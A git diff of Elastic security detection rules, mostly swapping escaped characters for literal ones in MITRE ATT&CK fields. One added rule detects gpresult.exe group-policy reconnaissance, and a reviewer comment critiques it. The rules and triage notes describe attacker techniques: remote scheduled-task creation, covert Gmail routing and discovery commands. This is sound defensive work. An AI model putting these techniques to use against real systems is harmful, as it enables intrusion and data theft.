"framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_1.json b/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_1.json index d9b38e98315..54c68566930 100644 --- a/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_1.json 
+++ b/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_1.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_2.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_2.json index bbe4f871b65..01b9232365c 100644 --- a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_2.json +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_3.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_3.json index 0598d0b5a04..847fb8cdbda 100644 --- a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_3.json +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_3.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_4.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_4.json index 6f3c65080a8..610af1c9256 100644 --- a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_4.json +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_4.json 
@@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_5.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_5.json new file mode 100644 index 00000000000..b63d27d7122 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_5.json 
@@ -0,0 +1,90 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects the usage of gpresult.exe to query group policy objects. Attackers may query group policy objects during the reconnaissance phase after compromising a system to gain a better understanding of the active directory environment and possible methods to escalate privileges or move laterally.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Group Policy Discovery via Microsoft GPResult Utility",
+ "note": "## Triage and analysis\n\n### Investigating Group Policy Discovery via Microsoft GPResult Utility\n\nGroup Policy is a Windows feature that allows administrators to manage and configure settings for users and computers in an Active Directory environment. The Microsoft GPResult utility (`gpresult.exe`) is a command-line tool used to query and display Group Policy Objects (GPOs) applied to a system.\n\nThis rule identifies the execution of `gpresult.exe` or renamed instances with specific arguments, which can be abused by attackers to gain insights into the active directory environment and identify potential privilege escalation or lateral movement opportunities.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate any abnormal behavior by the parent process, such as network connections, registry or file modifications, and any other spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(process.name: \"gpresult.exe\" or process.pe.original_file_name == \"gprslt.exe\") and process.args: (\"/z\", \"/v\", \"/r\", \"/x\")\n",
+ "related_integrations": [
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ },
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1615",
+ "name": "Group Policy Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1615/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 5
+ },
+ "id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7_5",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_104.json
index 3b236cdcc1f..f8dbc54078e 100644
--- a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_105.json
index cff3a6bea37..06196718727 100644
--- a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_105.json
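Review bot: The renamed-binary branch of the query, `process.pe.original_file_name == "gprslt.exe"`, uses the case-sensitive `==` while the sibling clause `process.name: "gpresult.exe"` uses the case-insensitive `:`; if any of the listed data sources reports the PE resource with different casing, the rename coverage the `note` advertises silently disappears, so `process.pe.original_file_name : "gprslt.exe"` would be the consistent form. The argument list `("/z", "/v", "/r", "/x")` also appears to leave out the documented `/h` report switch, which writes the same resultant-policy data to a file as `/x` does; worth confirming against the tool's help output before widening. Whatever is decided, the `note` should state that the argument list is intentionally narrow so the next maintainer does not read the omissions as an oversight.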
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Custom Gmail Route Created or Modified", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Custom Gmail Route Created or Modified\n\nGmail is a popular cloud-based email service developed and managed by Google. Gmail is one of many services available for users with Google Workspace accounts.\n\nThreat actors often send phishing emails containing malicious URL links or attachments to corporate Gmail accounts. Google Workspace identity relies on the corporate user Gmail account and if stolen, allows threat actors to further their intrusion efforts from valid user accounts.\n\nThis rule identifies the creation of a custom global Gmail route by an administrator from the Google Workspace admin console. Custom email routes could indicate an attempt to secretly forward sensitive emails to unintentional recipients.\n\n#### Possible investigation steps\n\n- Identify the user account that created the custom email route and verify that they should have administrative privileges.\n- Review the added recipients from the custom email route and confidentiality of potential email contents.\n- Identify the user account, then review `event.action` values for related activity within the last 48 hours.\n- If the Google Workspace license is Enterprise Plus or Education Plus, search for emails matching the route filters. To find the Gmail event logs, go to `Reporting \u003e Audit and investigation \u003e Gmail log events`.\n- If existing emails have been sent and match the custom route criteria, review the sender and contents for malicious URL links and attachments.\n- Identified URLs or attachments can be submitted to VirusTotal for reputational services.\n\n### False positive analysis\n\n- This rule searches for domain-wide custom email routes created in the admin console of Google Workspace. 
Administrators might create custom email routes to fulfill organizational requirements.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk 
of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Custom Gmail Route Created or Modified\n\nGmail is a popular cloud-based email service developed and managed by Google. Gmail is one of many services available for users with Google Workspace accounts.\n\nThreat actors often send phishing emails containing malicious URL links or attachments to corporate Gmail accounts. Google Workspace identity relies on the corporate user Gmail account and if stolen, allows threat actors to further their intrusion efforts from valid user accounts.\n\nThis rule identifies the creation of a custom global Gmail route by an administrator from the Google Workspace admin console. Custom email routes could indicate an attempt to secretly forward sensitive emails to unintentional recipients.\n\n#### Possible investigation steps\n\n- Identify the user account that created the custom email route and verify that they should have administrative privileges.\n- Review the added recipients from the custom email route and confidentiality of potential email contents.\n- Identify the user account, then review `event.action` values for related activity within the last 48 hours.\n- If the Google Workspace license is Enterprise Plus or Education Plus, search for emails matching the route filters. 
To find the Gmail event logs, go to `Reporting > Audit and investigation > Gmail log events`.\n- If existing emails have been sent and match the custom route criteria, review the sender and contents for malicious URL links and attachments.\n- Identified URLs or attachments can be submitted to VirusTotal for reputational services.\n\n### False positive analysis\n\n- This rule searches for domain-wide custom email routes created in the admin console of Google Workspace. Administrators might create custom email routes to fulfill organizational requirements.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:(\"CREATE_GMAIL_SETTING\" or \"CHANGE_GMAIL_SETTING\")\n and google_workspace.event.type:\"EMAIL_SETTINGS\" and google_workspace.admin.setting.name:(\"EMAIL_ROUTE\" or \"MESSAGE_SECURITY_RULE\")\n", "references": [ "https://support.google.com/a/answer/2685650?hl=en" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", 
diff --git a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_106.json
index 8d94b99f36b..fdebbe35904 100644
--- a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_106.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Custom Gmail Route Created or Modified", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Custom Gmail Route Created or Modified\n\nGmail is a popular cloud-based email service developed and managed by Google. Gmail is one of many services available for users with Google Workspace accounts.\n\nThreat actors often send phishing emails containing malicious URL links or attachments to corporate Gmail accounts. Google Workspace identity relies on the corporate user Gmail account and if stolen, allows threat actors to further their intrusion efforts from valid user accounts.\n\nThis rule identifies the creation of a custom global Gmail route by an administrator from the Google Workspace admin console. Custom email routes could indicate an attempt to secretly forward sensitive emails to unintentional recipients.\n\n#### Possible investigation steps\n\n- Identify the user account that created the custom email route and verify that they should have administrative privileges.\n- Review the added recipients from the custom email route and confidentiality of potential email contents.\n- Identify the user account, then review `event.action` values for related activity within the last 48 hours.\n- If the Google Workspace license is Enterprise Plus or Education Plus, search for emails matching the route filters. To find the Gmail event logs, go to `Reporting \u003e Audit and investigation \u003e Gmail log events`.\n- If existing emails have been sent and match the custom route criteria, review the sender and contents for malicious URL links and attachments.\n- Identified URLs or attachments can be submitted to VirusTotal for reputational services.\n\n### False positive analysis\n\n- This rule searches for domain-wide custom email routes created in the admin console of Google Workspace. 
Administrators might create custom email routes to fulfill organizational requirements.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk 
of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Custom Gmail Route Created or Modified\n\nGmail is a popular cloud-based email service developed and managed by Google. Gmail is one of many services available for users with Google Workspace accounts.\n\nThreat actors often send phishing emails containing malicious URL links or attachments to corporate Gmail accounts. Google Workspace identity relies on the corporate user Gmail account and if stolen, allows threat actors to further their intrusion efforts from valid user accounts.\n\nThis rule identifies the creation of a custom global Gmail route by an administrator from the Google Workspace admin console. Custom email routes could indicate an attempt to secretly forward sensitive emails to unintentional recipients.\n\n#### Possible investigation steps\n\n- Identify the user account that created the custom email route and verify that they should have administrative privileges.\n- Review the added recipients from the custom email route and confidentiality of potential email contents.\n- Identify the user account, then review `event.action` values for related activity within the last 48 hours.\n- If the Google Workspace license is Enterprise Plus or Education Plus, search for emails matching the route filters. 
To find the Gmail event logs, go to `Reporting > Audit and investigation > Gmail log events`.\n- If existing emails have been sent and match the custom route criteria, review the sender and contents for malicious URL links and attachments.\n- Identified URLs or attachments can be submitted to VirusTotal for reputational services.\n\n### False positive analysis\n\n- This rule searches for domain-wide custom email routes created in the admin console of Google Workspace. Administrators might create custom email routes to fulfill organizational requirements.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:(\"CREATE_GMAIL_SETTING\" or \"CHANGE_GMAIL_SETTING\")\n and google_workspace.event.type:\"EMAIL_SETTINGS\" and google_workspace.admin.setting.name:(\"EMAIL_ROUTE\" or \"MESSAGE_SECURITY_RULE\")\n", "references": [ "https://support.google.com/a/answer/2685650?hl=en" @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", 
diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_104.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_104.json
index 353c9979572..ed11f66bc31 100644
--- a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_104.json
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Remote Scheduled Task Creation", "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. 
Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", - "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port \u003e= 49152 and destination.port \u003e= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -85,7 +85,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_105.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_105.json
index 4349f5bb697..4b558ad07c4 100644
--- a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_105.json
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Remote Scheduled Task Creation", "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. 
Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", - "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port \u003e= 49152 and destination.port \u003e= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -99,7 +99,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_106.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_106.json
index 9dd4247b1f2..7fd9d4ca77a 100644
--- a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_106.json
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Remote Scheduled Task Creation", "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of 